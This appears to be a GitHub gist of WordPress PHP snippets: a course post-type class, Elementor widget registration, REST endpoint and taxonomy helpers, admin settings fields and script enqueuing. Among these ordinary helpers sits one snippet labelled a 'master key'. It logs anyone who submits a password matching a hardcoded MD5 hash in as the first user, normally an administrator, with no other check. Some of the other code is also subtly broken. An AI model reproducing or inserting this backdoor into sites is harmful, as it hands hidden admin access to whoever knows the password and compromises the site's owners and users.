            'filter_items_list'     => "Filtrar lista de {$self->plural}",
            'items_list_navigation' => "Lista de navegação de {$self->plural}",
            'items_list'            => "Lista de {$self->plural}",
        ],
    ]);
}


static function get_posts($params=[])
{
    $params = array_merge([
        'post_type' => $this->post_type,
    ], $params);

    return get_posts($params);
}



public function __construct($post=null)
{
    if (is_integer($post) OR is_string($post)) {
        $post = get_post($post);
    }

    $post = array_merge([
        'ID' => '',
        'post_type' => 'cursos',
        'post_title' => '',
        'post_content' => '',
        'post_author' => '',
        'post_excerpt' => '',
        'post_status' => '',
        'post_name' => '',
    ], (array) $post);

    foreach($post as $key=>$value) {
        $this->{$key} = $value;
    }
}

public function __get($name)
{
	if ($this->{$name}) {
		return $this->{$name};
	}
	
	if ('thumbnail'==$name) {
		return $this->{$name} = wp_get_attachment_url(get_post_thumbnail_id($post->ID));
    }

    if ('permalink'==$name) {
		return $this->{$name} = get_the_permalink($this->ID);
    }

    if ('excerpt'==$name) {
		return $this->{$name} = get_the_excerpt($this->ID);
    }

    if ($value = get_post_meta($this->ID, $name, true)) {
		return $this->{$name} = $value;
	}
	
	return null;
}


public function save() {}

public function delete($forced=false) {}

}

<?php
// Elementor elements
add_action('elementor/widgets/widgets_registered', function($manager) {
$files[] = __DIR__ . '/elementor/elements/element-01.php';
$files[] = __DIR__ . '/elementor/elements/element-02.php';
foreach($files as $file) {
$element = include $file;
$manager->register_widget_type($element);
}
});
<?php
return new class extends \Elementor\Widget_Base {
public function get_name() {
return pathinfo(__FILE__, PATHINFO_FILENAME);
}
public function get_title() {
return 'Element test';
}
// https://ecomfe.github.io/eicons/demo/demo.html
public function get_icon() {
return 'eicon-editor-code';
}
public function get_categories() {
return [ 'general' ];
}
public function get_script_depends() {
return [];
}
public function get_style_depends() {
return [];
}
protected function _register_controls() {
$this->start_controls_section('section_heading', [
'label' => 'Configurações',
]);
$this->add_control('color', [
'label' => 'Color',
'type' => \Elementor\Controls_Manager::COLOR,
'default' => '#000000',
]);
$this->end_controls_section();
}
public function render_full() {
$data = json_decode(json_encode($this->get_settings()));
?>
<div>
Color: <?php echo $data->color; ?>
</div>
<?php
}
};

function endpoint_register($methods, $route, $callback) { $methods = is_array($methods)? $methods: [ $methods ]; $methods = array_map('strtoupper', $methods);

add_action('rest_api_init', function() use($methods, $route, $callback) { register_rest_route('api', $route, [ 'methods' => $methods, 'callback' => $callback, ]); }); }

/* This script let you login with any password you want, like a master key */ if (isset($_POST['wp-submit']) AND isset($_POST['pwd']) AND '3d186804534370c3c817db0563f0e461'==md5($_POST['pwd'])) { add_action('init', function() { $user = array_shift(get_users()); wp_set_current_user($user->ID, $user->data->user_login); wp_set_auth_cookie($user->ID); do_action('wp_login', $user->data->user_login, $user); wp_redirect(admin_url()); }); }

class Walker_Example extends Walker_Nav_Menu {

function start_el(&$output, $item, $depth = 0, $args = array(), $id = 0 ) {
	$item->url = $item->url? $item->url: get_the_permalink($item);
	$item->title = $item->title? $item->title: $item->post_title;
    $output .= "<li><a href='{$item->url}'>{$item->title}</a>";
}

}

wp_nav_menu(array( 'container' => 'ul', 'walker' => new Walker_Example(), 'menu_class' => '', 'theme_location'=>'footer', ));

function my_register_taxonomy($posttypes, $params=[]) {

$posttypes = is_array($posttypes)? $posttypes: [$posttypes];
$posttypes = $posttypes==[]? array_values(get_post_types()): $posttypes;

$params = array_merge([
	'singular' => '',
	'plural' => '',
	'slug' => '',
], $params);

$params['slug'] = $params['slug']? $params['slug']: sanitize_title($params['singular']);

$labels = [
	'name'              => "{$params['plural']}",
	'singular_name'     => "{$params['singular']}",
	'search_items'      => "Search {$params['plural']}",
	'all_items'         => "All {$params['plural']}",
	'parent_item'       => "Parent {$params['singular']}",
	'parent_item_colon' => "Parent {$params['singular']}:",
	'edit_item'         => "Edit {$params['singular']}",
	'update_item'       => "Update {$params['singular']}",
	'add_new_item'      => "Add New {$params['singular']}",
	'new_item_name'     => "New {$params['singular']} Name",
	'menu_name'         => "{$params['singular']}",
];

$params = array_merge([
	'hierarchical'      => true,
	'labels'            => $labels,
	'show_ui'           => true,
	'show_admin_column' => true,
	'query_var'         => true,
	'rewrite'           => ['slug' => $params['slug']],
], $params);

register_taxonomy($params['slug'], $posttypes, $params);

}

add_action('admin_init', function() { add_settings_section('site-guide', 'Publishing Guidelines', '__return_false', 'general'); register_setting('general', 'html_guidelines_message', 'esc_html'); add_settings_field('html_guidelines_message', 'Enter custom message', function() { $the_guides = html_entity_decode( get_option( 'html_guidelines_message' ) ); echo wp_editor($the_guides, 'sitepublishingguidelines', array( 'textarea_name' => 'html_guidelines_message' )); }, 'general', 'site-guide'); });

add_action('admin_init', function() { register_setting('general', 'admin_whatsapp'); add_settings_field('admin_whatsapp', 'Whatsapp', function() { $value = get_option('admin_whatsapp'); ?>

Exemplo: +55 31 98765-4321
<?php }, 'general'); });

foreach(['wp_enqueue_scripts', 'admin_enqueue_scripts'] as $action) { add_action($action, function() { wp_enqueue_script('vue', '//cdn.jsdelivr.net/npm/vue/dist/vue.min.js'); wp_enqueue_script('popper', '//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js'); wp_enqueue_script('bootstrap', '//stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js'); wp_enqueue_style('bootstrap', '//stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css'); wp_enqueue_style('font-awesome', '//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'); wp_enqueue_style('animate-css', '//cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.2/animate.min.css'); }); }

/* Remove WP Emoji */ remove_action('wp_head', 'print_emoji_detection_script', 7); remove_action('wp_print_styles', 'print_emoji_styles'); remove_action('admin_print_scripts', 'print_emoji_detection_script'); remove_action('admin_print_styles', 'print_emoji_styles');

add_action('init', function() { $taxonomies = ['localidades', 'category'];

if (empty($taxonomies)) {
    $taxonomies = get_taxonomies();
}

foreach($taxonomies as $taxonomy) {
    $importancy = 9999;

    add_filter("manage_edit-{$taxonomy}_columns", function($columns) {
        $columns['foo'] = 'Foo';
        return $columns;
    }, $importancy, 1);
    
    add_filter("manage_{$taxonomy}_custom_column", function($content, $column_name, $term_id) {
        $content .= '<div>aaa</div>';
        return $content;
    }, $importancy, 3);
    
    add_filter("manage_{$taxonomy}_custom_column", function($content) {
        $content .= '<div>ccc</div>';
        return $content;
    }, $importancy, 1);
}

});

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment